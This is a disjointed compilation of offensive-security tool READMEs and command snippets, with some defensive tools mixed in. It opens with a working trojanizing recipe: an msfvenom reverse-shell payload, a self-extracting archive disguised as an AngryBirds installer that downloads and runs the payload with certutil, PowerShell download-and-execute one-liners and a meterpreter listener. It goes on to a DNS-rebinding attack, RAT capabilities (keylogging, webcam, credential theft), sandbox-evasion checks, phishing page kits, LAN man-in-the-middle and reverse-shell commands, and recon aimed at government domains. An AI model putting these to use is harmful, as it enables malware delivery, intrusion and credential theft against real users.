msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

cp payload.exe /var/www/html/payload.exe
service apache2 start

PRE_SETUP=ON
SINGLE_EXEC=ON

PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh

AllowUntrustedAccess("foobar.com");
SendArbitraryRequests("foobar.com");

GET /CanIDisableSecurity HTTP/1.1

<ipv4 in base-16>.<ipv4 in base-16>.rbndr.us

7f000001.c0a80001.rbndr.us

$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 127.0.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 127.0.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 127.0.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 127.0.0.1
$ host 7f000001.c0a80001.rbndr.us
7f000001.c0a80001.rbndr.us has address 192.168.0.1

// Keep calling api until it resolves to the address you control and you get granted access
while (AllowUntrustedAccesss("7f000001.c0a80001.rbndr.us") != true)
  ;

// Access granted, now wait for it to re-bind
while (ConnectToPort("7f000001.c0a80001.rbndr.us", 123) != true)
 ;

 // Now you have access to localhost:123 even though localhost did not opt-in to reduced security.
 SomethingEvil();

git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
git submodule init
git submodule update
pip install -r pupy/requirements.txt
wget https://github.com/n1nj4sec/pupy/releases/download/latest/payload_templates.txz
tar xvf payload_templates.txz && mv payload_templates/* pupy/payload_templates/ && rm payload_templates.txz && rm -r payload_templates

• Multi-platform (tested on windows xp, 7, 8, 10, kali linux, ubuntu, osx, android)
• On windows, the Pupy payload can be compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
• pupy can also be packed into a single .py file and run without any dependencies other that the python standard library on all OS
  • pycrypto gets replaced by pure python aes && rsa implementations when unavailable
• Pupy can reflectively migrate into other processes
• Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd, .so). The imported python modules do not touch the disk.
• Pupy is easily extensible, modules are quite simple to write, sorted by os and category.
• A lot of awesome modules are already implemented!
• Pupy uses rpyc and a module can directly access python objects on the remote client
  • We can also access remote objects interactively from the pupy shell and you even get auto-completion of remote attributes!
• Communication transports are modular, stackable and awesome. You could exfiltrate data using HTTP over HTTP over AES over XOR. Or any combination of the available transports !
• Pupy can communicate using obfsproxy pluggable transports
• All the non interactive modules can be dispatched to multiple hosts in one command
• Commands and scripts running on remote hosts are interruptible
• Auto-completion for commands and arguments
• Custom config can be defined: command aliases, modules automatically run at connection, ...
• Interactive python shells with auto-completion on the all in memory remote python interpreter can be opened
• Interactive shells (cmd.exe, /bin/bash, ...) can be opened remotely. Remote shells on Unix & windows clients have a real tty with all keyboard signals working fine just like a ssh shell
• Pupy can execute PE exe remotely and from memory (cf. ex with mimikatz)
• Pupy can generate payloads in various formats : apk,lin_x86,lin_x64,so_x86,so_x64,exe_x86,exe_x64,dll_x86,dll_x64,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky
• Pupy can be deployed in memory, from a single command line using pupygen.py's python or powershell one-liners.
• "scriptlets" can be embeded in generated payloads to perform some tasks "offline" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm ...)
• tons of other features, check out the implemented modules

• rsa
  • A layer with authentication & encryption using RSA and AES256, often stacked with other layers
• aes
  • layer using a static AES256 key
• ssl (the default one)
  • TCP transport wrapped with SSL
• ssl_rsa
  • same as ssl but stacked with a rsa layer
• http
  • layer making the traffic look like HTTP traffic. HTTP is stacked with a rsa layer
• obfs3
  • A protocol to keep a third party from telling what protocol is in use based on message contents
  • obfs3 is stacked with a rsa layer for a better security
• scramblesuit
  • A Polymorphic Network Protocol to Circumvent Censorship
  • scramblesuit is stacked with a rsa layer for a better security
• udp
  • rsa layer but over UDP (could be buggy, it doesn't handle packet loss yet)
• other
  • Other layers doesn't really have any interest and are given for code examples : (dummy, base64, XOR, ...)

• connect
  • Just connect back
• bind
  • Bind payload instead of reverse
• auto_proxy
  • Retrieve a list of possible SOCKS/HTTP proxies and try each one of them. Proxy retrieval methods are: registry, WPAD requests, gnome settings, HTTP_PROXY env variable

• command execution
• download
• upload
• interactive python shell with auto-completion
• interactive shell (cmd.exe, powershell.exe, /bin/sh, /bin/bash, ...)
  • tty allocation is well supported on both windows and *nix. Just looks like a ssh shell
• shellcode exec
• persistence
• socks5 proxy
• local and remote port forwarding
• screenshot
• keylogger
• run the awesome credential gathering tool LaZagne from memory !
• sniff tools, netcreds
• process migration (windows & linux, not osx yet)
• ...
• a lot of other tools (upnp client, various recon/pivot tools using impacket remotely, ...)

• migrate
  • inter process architecture injection also works (x86->x64 and x64->x86)
• in memory execution of PE exe both x86 and x64!
  • works very well with mimitakz :-)
• webcam snapshot
• microphone recorder
• mouselogger:
  • takes small screenshots around the mouse at each click and send them back to the server
• token manipulation
• getsystem
• creddump
• tons of useful powershell scripts
• ...

• Text to speech for Android to say stuff out loud
• webcam snapshots (front cam & back cam)
• GPS tracker !

• It creates a directory with all the information, including nmap output files.
• It uses colors to remark important information on the console.
• It detects some security problems like host name problems, unusual port numbers and zone transfers.
• It is heavily tested and it is very robust against DNS configuration problems.
• It uses nmap for active host detection, port scanning and version information (including nmap scripts).
• It searches for SPF records information to find new hostnames or IP addresses.
• It searches for reverse DNS names and compare them to the hostname.
• It prints out the country of every IP address.
• It creates a PDF file with results.
• It automatically detects and analyze sub-domains!
• It searches for domains emails.
• It checks the 192 most common hostnames in the DNS servers.
• It checks for Zone Transfer on every DNS server.
• It finds the reverse names of the /24 network range of every IP address.
• It finds active host using nmap complete set of techniques.
• It scan ports using nmap (remember that for the SYN scan you need to need root).
• It searches for host and port information using nmap.
• It automatically detects web servers used.
• It crawls every web server page using our crawler.py tool. See the description below.
• It filters out hostnames based on their name.
• It pseudo-randomly searches N domains in Google and automatically analyze them!
• Uses CTRL-C to stop current analysis stage and continue working.
• It can read an external file with domain names and try to find them on the domain.

• Crawl http and https web sites.
• Crawl http and https web sites not using common ports.
• Uses regular expressions to find 'href' and 'src' html tag. Also content links.
• Identifies relative links.
• Identifies domain related emails.
• Identifies directory indexing.
• Detects references to URLs like 'file:', 'feed=', 'mailto:', 'javascript:' and others.
• Uses CTRL-C to stop current crawler stages and continue working.
• Identifies file extensions (zip, swf, sql, rar, etc.)
• Download files to a directory:
  • Download every important file (images, documents, compressed files).
  • Or download specified files types.
  • Or download a predefined set of files (like 'document' files: .doc, .xls, .pdf, .odt, .gnumeric, etc.).
• Maximum amount of links to crawl. A default value of 5000 URLs is set.
• Follows redirections using HTML and JavaScript Location tag and HTTP response codes.

• World-domination: You can automatically analyze the whole world! (if you have time)
• Robin-hood: Although it is still in development, it will let you send automatically an email to the mails found during scan with the analysis information.
• Robtex DNS: With this incredible function, every time you found a DNS servers with Zone Transfer, it will retrieve from the Robtex site other domains using that DNS server! It will automatically analyze them too! This can be a never ending test! Every vulnerable DNS server can be used by hundreds of domains, which in turn can be using other vulnerable DNS servers. BEWARE! Domains retrieved can be unrelated to the first one.

• Find 10 random domains in the .gov domain and analyze them fully (including web crawling). If it finds some Zone Transfer, retrieve more domains using them from Robtex!!
  

  domain_analyzer.py -d .gov -k 10 -b

• (Very Quick and dirty) Find everything related with .edu.cn domain, store everything in directories. Do not search for active host, do not nmap scan them, do not reverse-dns the netblock, do not search for emails.
  

  domain_analyzer.py -d edu.cn -b -o -g -a -n

• Analyze the 386.edu.ru domain fully
  

  domain_analyzer.py -d 386.edu.ru -b -o

• (Pen tester mode). Analyze a domain fully. Do not find other domains. Print everything in a pdf file. Store everything on disk. When finished open Zenmap and show me the topology every host found at the same time!
  

  domain_analyzer.py -d amigos.net -o -e

• (Quick with web crawl only). Ignore everything with 'google' on it.
  

  domain_analyzer.py -d mil.cn -b -o -g -a -n -v google -x '-O --reason --webxml --traceroute -sS -sV -sC -PN -n -v -p 80,4443'

• (Everything) Crawl up to 100 URLs of this site including subdomains. Store output into a file and download every INTERESTING file found to disk.
  

  crawler.py -u www.386.edu.ru -w -s -m 100 -f

• (Quick and dirty) Crawl the site very quick. Do not download files. Store the output to a file.
  

  crawler.py -u www.386.edu.ru -w -m 20

• (If you want to analyze metadata later with lafoca). Verbose prints which extensions are being downloaded. Download only the set of archives corresponding to Documents (.doc, .docx, .ppt, .xls, .odt. etc.)
  

  crawler.py -u ieeeexplore.ieee.org/otherfiles/ -d -v

1. Example domain_analyzer.py -d .gov -k 10 -b

• ansistrm.py
• crawler.py
• pyText2pdf.py

• IsDebuggerPresent
• CheckRemoteDebuggerPresent
• Process Environement Block (BeingDebugged)
• Process Environement Block (NtGlobalFlag)
• ProcessHeap (Flags)
• ProcessHeap (ForceFlags)
• NtQueryInformationProcess (ProcessDebugPort)
• NtQueryInformationProcess (ProcessDebugFlags)
• NtQueryInformationProcess (ProcessDebugObject)
• NtSetInformationThread (HideThreadFromDebugger)
• NtQueryObject (ObjectTypeInformation)
• NtQueryObject (ObjectAllTypesInformation)
• CloseHanlde (NtClose) Invalide Handle
• SetHandleInformation (Protected Handle)
• UnhandledExceptionFilter
• OutputDebugString (GetLastError())
• Hardware Breakpoints (SEH / GetThreadContext)
• Software Breakpoints (INT3 / 0xCC)
• Memory Breakpoints (PAGE_GUARD)
• Interrupt 0x2d
• Interrupt 1
• Parent Process (Explorer.exe)
• SeDebugPrivilege (Csrss.exe)
• NtYieldExecution / SwitchToThread
• TLS callbacks
• Process jobs

• Erase PE header from memory
• SizeOfImage

• RDTSC (with CPUID to force a VM Exit)
• RDTSC (Locky version with GetProcessHeap & CloseHandle)
• Sleep -> SleepEx -> NtDelayExecution
• Sleep (in a loop a small delay)
• Sleep and check if time was accelerated (GetTickCount)
• SetTimer (Standard Windows Timers)
• timeSetEvent (Multimedia Timers)
• WaitForSingleObject -> WaitForSingleObjectEx -> NtWaitForSingleObject
• WaitForMultipleObjects -> WaitForMultipleObjectsEx -> NtWaitForMultipleObjects (todo)
• IcmpSendEcho (CCleaner Malware)
• CreateWaitableTimer (todo)
• CreateTimerQueueTimer (todo)
• Big crypto loops (todo)

• Mouse movement
• Total Physical memory (GlobalMemoryStatusEx)
• Disk size using DeviceIoControl (IOCTL_DISK_GET_LENGTH_INFO)
• Disk size using GetDiskFreeSpaceEx (TotalNumberOfBytes)
• Mouse (Single click / Double click) (todo)
• DialogBox (todo)
• Scrolling (todo)
• Execution after reboot (todo)
• Count of processors (Win32/Tinba - Win32/Dyre)
• Sandbox known product IDs (todo)
• Color of background pixel (todo)
• Keyboard layout (Win32/Banload) (todo)

• Registry key value artifacts
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VBOX)
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (QEMU)
  • HARDWARE\Description\System (SystemBiosVersion) (VBOX)
  • HARDWARE\Description\System (SystemBiosVersion) (QEMU)
  • HARDWARE\Description\System (VideoBiosVersion) (VIRTUALBOX)
  • HARDWARE\Description\System (SystemBiosDate) (06/23/99)
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
• Registry Keys artifacts
  • "HARDWARE\ACPI\DSDT\VBOX__"
  • "HARDWARE\ACPI\FADT\VBOX__"
  • "HARDWARE\ACPI\RSDT\VBOX__"
  • "SOFTWARE\Oracle\VirtualBox Guest Additions"
  • "SYSTEM\ControlSet001\Services\VBoxGuest"
  • "SYSTEM\ControlSet001\Services\VBoxMouse"
  • "SYSTEM\ControlSet001\Services\VBoxService"
  • "SYSTEM\ControlSet001\Services\VBoxSF"
  • "SYSTEM\ControlSet001\Services\VBoxVideo"
  • SOFTWARE\VMware, Inc.\VMware Tools
  • SOFTWARE\Wine
• File system artifacts
  • "system32\drivers\VBoxMouse.sys"
  • "system32\drivers\VBoxGuest.sys"
  • "system32\drivers\VBoxSF.sys"
  • "system32\drivers\VBoxVideo.sys"
  • "system32\vboxdisp.dll"
  • "system32\vboxhook.dll"
  • "system32\vboxmrxnp.dll"
  • "system32\vboxogl.dll"
  • "system32\vboxoglarrayspu.dll"
  • "system32\vboxoglcrutil.dll"
  • "system32\vboxoglerrorspu.dll"
  • "system32\vboxoglfeedbackspu.dll"
  • "system32\vboxoglpackspu.dll"
  • "system32\vboxoglpassthroughspu.dll"
  • "system32\vboxservice.exe"
  • "system32\vboxtray.exe"
  • "system32\VBoxControl.exe"
  • "system32\drivers\vmmouse.sys"
  • "system32\drivers\vmhgfs.sys"
• Directories artifacts
  • "%PROGRAMFILES%\oracle\virtualbox guest additions\"
  • "%PROGRAMFILES%\VMWare\"
• Memory artifacts
  • Interupt Descriptor Table (IDT) location
  • Local Descriptor Table (LDT) location
  • Global Descriptor Table (GDT) location
  • Task state segment trick with STR
• MAC Address
  • "\x08\x00\x27" (VBOX)
  • "\x00\x05\x69" (VMWARE)
  • "\x00\x0C\x29" (VMWARE)
  • "\x00\x1C\x14" (VMWARE)
  • "\x00\x50\x56" (VMWARE)
• Virtual devices
  • "\\.\VBoxMiniRdrDN"
  • "\\.\VBoxGuest"
  • "\\.\pipe\VBoxMiniRdDN"
  • "\\.\VBoxTrayIPC"
  • "\\.\pipe\VBoxTrayIPC")
  • "\\.\HGFS"
  • "\\.\vmci"
• Hardware Device information
  • SetupAPI SetupDiEnumDeviceInfo (GUID_DEVCLASS_DISKDRIVE)
    • QEMU
    • VMWare
    • VBOX
    • VIRTUAL HD
• System Firmware Tables
  • SMBIOS string checks (VirtualBox)
  • ACPI string checks (VirtualBox)
• Adapter name
  • VMWare
• Windows Class
  • VBoxTrayToolWndClass
  • VBoxTrayToolWnd
• Network shares
  • VirtualBox Shared Folders
• Processes
  • vboxservice.exe (VBOX)
    • vboxtray.exe (VBOX)
      • vmtoolsd.exe(VMWARE)
    • vmwaretray.exe(VMWARE)
      • vmwareuser(VMWARE)
      • vmsrvc.exe(VirtualPC)
      • vmusrvc.exe(VirtualPC)
      • prl_cc.exe(Parallels)
      • prl_tools.exe(Parallels)
    • xenservice.exe(Citrix Xen)
• WMI
  • SELECT * FROM Win32_Bios (SerialNumber) (VMWARE)
  • SELECT * FROM Win32_PnPEntity (DeviceId) (VBOX)
  • SELECT * FROM Win32_NetworkAdapterConfiguration (MACAddress) (VBOX)
  • SELECT * FROM Win32_NTEventlogFile (VBOX)
  • SELECT * FROM Win32_Processor (NumberOfCores) (GENERIC)
  • SELECT * FROM Win32_LogicalDisk (Size) (GENERIC)
• DLL Exports and Loaded DLLs
  • kernel32.dll!wine_get_unix_file_nameWine (Wine)
  • sbiedll.dll (Sandboxie)
  • dbghelp.dll (MS debugging support routines)
  • api_log.dll (iDefense Labs)
  • dir_watch.dll (iDefense Labs)
  • pstorec.dll (SunBelt Sandbox)
  • vmcheck.dll (Virtual PC)
  • wpespy.dll (WPE Pro)
• CPU
  • Hypervisor presence using (EAX=0x1)
  • Hypervisor vendor using (EAX=0x40000000)
    • "KVMKVMKVM\0\0\0" (KVM)
      
      • "Microsoft Hv"(Microsoft Hyper-V or Windows Virtual PC)
      • "VMwareVMware"(VMware)
      • "XenVMMXenVMM"(Xen)
      • "prl hyperv "( Parallels) -"VBoxVBoxVBox"( VirtualBox)

• Processes
  
  • OllyDBG / ImmunityDebugger / WinDbg / IDA Pro
  • SysInternals Suite Tools (Process Explorer / Process Monitor / Regmon / Filemon, TCPView, Autoruns)
  • Wireshark / Dumpcap
  • ProcessHacker / SysAnalyzer / HookExplorer / SysInspector
  • ImportREC / PETools / LordPE
  • JoeBox Sandbox

• Document_Close / Auto_Close.
• Application.RecentFiles.Count

• CreateRemoteThread
• SetWindowsHooksEx
• NtCreateThreadEx
• RtlCreateUserThread
• APC (QueueUserAPC / NtQueueApcThread)
• RunPE (GetThreadContext / SetThreadContext)

• mrexodia: Main developer of x64dbg
• Mattiwatti: Matthijs Lavrijsen
• gsuberland: Graham Sutherland

• An Anti-Reverse Engineering Guide By Josh Jackson.
• Anti-Unpacker Tricks By Peter Ferrie.
• The Art Of Unpacking By Mark Vincent Yason.
• Walied Assar's blog http://waleedassar.blogspot.de/.
• Pafish tool: https://github.com/a0rtega/pafish.
• PafishMacro by JoeSecurity: https://github.com/joesecurity/pafishmacro

• The homepage

• Adding an hash to crack

• Seeing the results and some stats

• This Web application can be used to launch asynchronous password cracks with hashcat.
• The interface tries to be as user-friendly as possible and facilitates the password cracking method choice and to automate the succession of various attack modes.
• It also displays statistics regarding the cracked passwords and allows to export the cracked password list in CSV.
• The application is designed to be used in a multi-user environment with a strict segregation between the cracking results of different users: the user authentication can be done through an LDAP directory or basic auth.

• Add new password hashes, choose the attack mode and the crack duration
• View the past and current cracks for your user with statistics and graphs
• View the overall load of the platform
• Upload a password-protected file and extract its hash

• hashcat: follow these instructions for CPU only usage on a Kali linux host
• flask (>=0.10.1)
• celery (>=3.1.18)
• SQLite (>=3.8.7.4)
• rabbitmq-server (>= 3.4.3)
• Rules for hashcat (examples)
• Wordlists (examples)

• Install the RabbitMQ server and python-ldap requirements

$ apt-get install libsasl2-dev libldap2-dev libssl-dev rabbitmq-server

• Install the python requirements

$ pip install -r requirements.txt

• Create a cracker/app_settings.py configuration file from the cracker/app_settings.py.example file and notably edit the Mandatory settings section:
  
  • The path of hashcat
  • The RabbitMQ connection string: by default, the guest/guest account is used. Be sure to harden your installation
  • The path of the SQLite database
  • The path of the hashcat rules
  • The path of the wordlists
  • The LDAP parameters:
    • IP address
    • port
    • LDAP database for the users
    • Base DN
• Initialize the local database linked in the cracker/app_settings.py configuration file
  

$ sqlite3 base.db < base_schema.sql

• Start the RabbitMQ server

$ sudo service rabbitmq-server start

• Start Celery from the application folder

$ celery worker -A cracker.celery

• Launch the Flask Web server
  
  • Directly from the server.py file: this mode is not suitable for production purpose

  $ python server.py

  • With a wsgi script: an example of app.wsgi.example is provided
  • Similarly, supervisorctl can be used to manage celery with a configuration file example in supervisorcelery.conf.example
• In order to stop the cracks after a certain amount of time, you can use the provided cron script.
  
• If you want to update the list of hashes supported, you can use the dedicated script which will parse hashcat's wiki and generate an updated hashcat_hashes.py. To do so, you need to have BeautifulSoup installed on your system.
  

Web Shell Detector is a php script that helps you find and identify php/cgi(perl)/asp/aspx shells. Web Shell Detector has a “web shells” signature database that helps to identify “web shell” up to 99%. By using the latest javascript and css technologies, web shell detector has a light weight and friendly interface.

1. Upload shelldetect.php and shelldetect.db to your root directory
   
2. Open shelldetect.php file in your browser
   Example: http://www.website.com/shelldetect.php
   
3. Use default username & password
   Username: admin Password: protect
   
4. Inspect all strange files, if some of files look suspicious, send them to http://www.shelldetector.com team. After submitting your file, it will be inspected and if there are any threats, it will be inserted into a “web shell detector” web shells signature database.
   
5. If any web shells found and identified use your ftp/ssh client to remove it from your web server (IMPORTANT: please be careful because some of shells may be integrated into system files!).
   

http://www.emposha.com/demo/shelldetect/

• extension - extensions that should be scanned
• showlinenumbers - show line number where suspicious function used
• dateformat - used with access time & modified time
• langauge - if I want to use other language
• directory - scan specific directory
• task - perform different task
• report_format - used with is_cron(true) file format for report file
• is_cron - if true run like a cron(no output)
• filelimit - maximum files to scan (more then 30000 you should scan specific directory)
• useget - activate _GET variable for easy way to recive tasks
• authentication - protect script with user & password in case to disable simply set to NULL
• remotefingerprint - get shells signatures db by remote

• 1.66 thanks to John Thornton for small tweeks and php 5.3.3 support
  
• 1.64 settings ini file support added(in case that you want to use same settings without code changing), output method rewriten, is_cron fixed, italian translation added (thanks to Marco Saiu)
  
• 1.63 new shell recognize mechanizm added, shell signatures updated.
  
• 1.62 version of jquery reverted to 1.7.x due bug with jquery ui dialog, new type of files added, shells signatures updated
  
• 1.61 added new way to send suspicious files, some css & code fixes, new shells signatures added
  
• 1.6 added support to indicate not shell files (but still those files need to be removed), loader indicator added
  
• 1.52 noindex meta tag added (to remove script from search results), scann all files options added: extension = *
  
• 1.51 unpack function update
  
• 1.5 unpack function added, application version check added, many warnings fixed, error handler fixed.
  
• 1.4 hide suspicious files option added, file scanning changed.
  
• 1.3 submission of suspicious file to shelldetector.com changed, email field added with ability to get notify about suspicious file.
  
• 1.2 encryption function added, authentication added, some small bugs fixed
  
• 1.1 fingerprint function change show line regex changed
  
• 1.0 first version

    ,-------(returns objects)---------,
    |                                 |
[ sqlmap ] --(sends objects)--> [tamper-api] --(sends json)--> [your-script]
                                      ^                             |
                                      |________(returns json)_______|  

#!/usr/bin/env ruby
#
# Author:       KING SABRI | @KINGSABRI
# Description:  Base64 encoding all characters in a given payload
# Requirements: None
#
require 'json'
require 'base64'

@json    = JSON.parse(ARGV[0])
@payload = @json["payload"]
@kwargs  = @json["kwargs"]

@json["payload"] = Base64.urlsafe_encode64(@payload)

print @json.to_json

• Copy tamper-api.py script into sqlmap/tamper directory.
• Check tamper-scripts/[YOUR_LANGUAGE] for practical examples.

sqlmap -u http://example.com/pages.php?page=1 --tamper tamper-api base64encode.rb

• 1- Get tweets from twitter.
• 2- Filter tweets.
• 3- Tweet classification with naive bayes algorithm (Positive,negative and neut).

git clone https://github.com/omergunal/twebit
cd twebit
pip3 install -r requirements.txt

python3 twebit.py

• Python <= 2.7

git clone https://github.com/m4ll0k/Infoga.git infoga
cd infoga
pip install -r requirements.txt
python infoga.py

python infoga.py --domain [DOMAIN] --source [SOURCE] --verbose [LEVEL]

python infoga.py --info [EMAIL] --verbose [LEVEL]

python infoga.py --domain fbi.gov --source google --verbose 3

python infoga.py --domain  fbi.gov --source all --verbose 3

A linux based high performance DEScrypt CPU cracker written in c++, it deduces the salt and uses a password list to crack hashes.

• Ability to crack hashes both from a file and individually
• Detects CPU cores
• Adjustable number of threads
• Colon-separated output file
• Clear readable display
• Average hash rate of 22,000/s with the default 10 threads

    Command         Description
    -------         -----------
    -l=             File Location of HashList
    -i=             Individual Hash
    -w=             File Location of Wordlist
    -o=             File Location of Output File
    -t=             Number of Threads(Default is 10)

• Getting started
  • Installing
• Development
  • Setting up the dev-server
• Builds and deployment
• CircleCI
• TravisCI

 nmap libraries:
     http
     json
     string

 locate, where your nmap scripts are located in your system
     for *nix system it might be  ~/.nmap/scripts/ or $NMAPDIR
     for Mac it might be /usr/local/Cellar/nmap/<version>/share/nmap/scripts/
     for Windows you have to find it yourself
 copy the provided script (vulners.nse) into that directory

Use it as straightforward as you can:
    nmap -sV --script vulners <target>

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Changes:
--------
* Tests can have more than 1 required OS (e.g. Linux OR NetBSD)
* Added 'system-groups' option to profile (Enterprise users)
* Overhaul of default profile and migrate to new style (setting=value)
* Show warning if old profile options are used
* Improved detection of binaries
* New group 'usb' for tests related to USB devices

Tests:
------
* [FILE-6363] - New test for /var/tmp (sticky bit)
* [MAIL-8802] - Added exim4 process name to improve detection of Exim
* [NETW-3030] - Changed name of dhcp client name process and added udhcpc
* [SSH-7408] - Restored UsePrivilegeSeparation
* [TIME-3170] - Added chrony configuration file for NetBSD

$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py

[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.

[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.

After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.

Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.

After you send you username of choise to @BotFather, you will recieve
your API key.

[+] Now for lanGhost to only allow access to you, you need to verify yourself.

Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.

[+] Verification code to send: ******

[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)

If you are ready with the setup just reboot the Pi and lanGhost will start right up!

Usage:

warnings:

/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.

warning:

$ nc -l 0.0.0.0 [PORT]

/reversesh [IP-of-your-listening-server] [PORT]

• /kill - Stops the internet connectivity for the target.
• /mitm - Captures HTTP and DNS traffic from the target and sends it in text messages.
• /replaceimg - Replaces HTTP images for the target to what picture you send to the bot.
• /injectjs - Injects JavaScript into every HTTP HTML response for the target. You need to host the the JS file on your server and give the URL as a parameter.
• /spoofdns - Spoofs DNS responses for the target.

• /scan - Scans the local network and returns the hosts online. Uses nmap -sn scan to discover hosts.
• /scanip - Scans an IP address for open ports and other info. Uses nmap -sS scan.

• Python 2.7
• Wget from Python
• PHP

git clone https://github.com/UndeadSec/SocialFish.git

cd SocialFish
sudo pip install -r requirements.txt
python SocialFish.py

• Traditional Facebook login page.
• Advanced login with Facebook.

• Traditional Google login page.
• Advanced login with Facebook.

• Traditional LinkedIN login page.

• Traditional Github login page.

• Traditional Stackoverflow login page.

• Similar Wordpress login page.

• Clone or fork the repo to your machine.
• Once downloaded, cd into the osint-scraper directory.
• Begin a new virtual environment with Python 3 and activate it.
• cd into the next osint-scraper directory. It should be at the same level of the setup.py file.
• pip install -e . on the command line to install all dependencies.
• pip install pytest
• $ pserve development.ini --reload to serve the application on http://localhost:6543

• Similar SSID broadcasts
• Same SSID broadcasts
• Calculates unencrypted wireless networks density
• Watches SSID broadcasts at the blacklist.

• Calculates Unencrypted wireless network density
• Finds same ssid, different encryption

• Collects all the packets from Wireless Networks.
• Analyzes all the beacon packets.
• If PiDens detects more than defined threshold of OPN number, or different encryption with same SSID info ;
• Logs the activity with some extra information within defined template.

• Blacklist SSID analysis
• Company name setting for illegal wireless attack activities (Monitoring)

• Hardware: TP LINK TL-WN722N
• Modules: scapy, time, termcolor, argparse

git clone https://github.com/WiPi-Hunter/PiDense.git

pip install termcolor

airmon-ng start interface(wlan0,wlan1) (Monitor mode)

or 

ifconfig wlan0 down
iwconfig wlan0 mode Monitor
ifconfig wlan0 up

cd PiDense
python pidense.py -h

• RDP Man In The Middle proxy which record session
• RDP Honeypot
• RDP screenshoter
• RDP client
• VNC client
• VNC screenshoter
• RSS Player

• rdpy-rdpclient
• rdpy-rdpscreenshot
• rdpy-vncclient
• rdpy-vncscreenshot
• rdpy-rssplayer

sudo apt-get install python-qt4

$ brew install qt sip pyqt

$ git clone https://github.com/citronneur/rdpy.git rdpy
$ pip install twisted pyopenssl qt4reactor service_identity rsa pyasn1
$ python rdpy/setup.py install

$ pip install rdpy

$ ln -s /usr/lib/python2.7/dist-packages/PyQt4/ $VIRTUAL_ENV/lib/python2.7/site-packages/
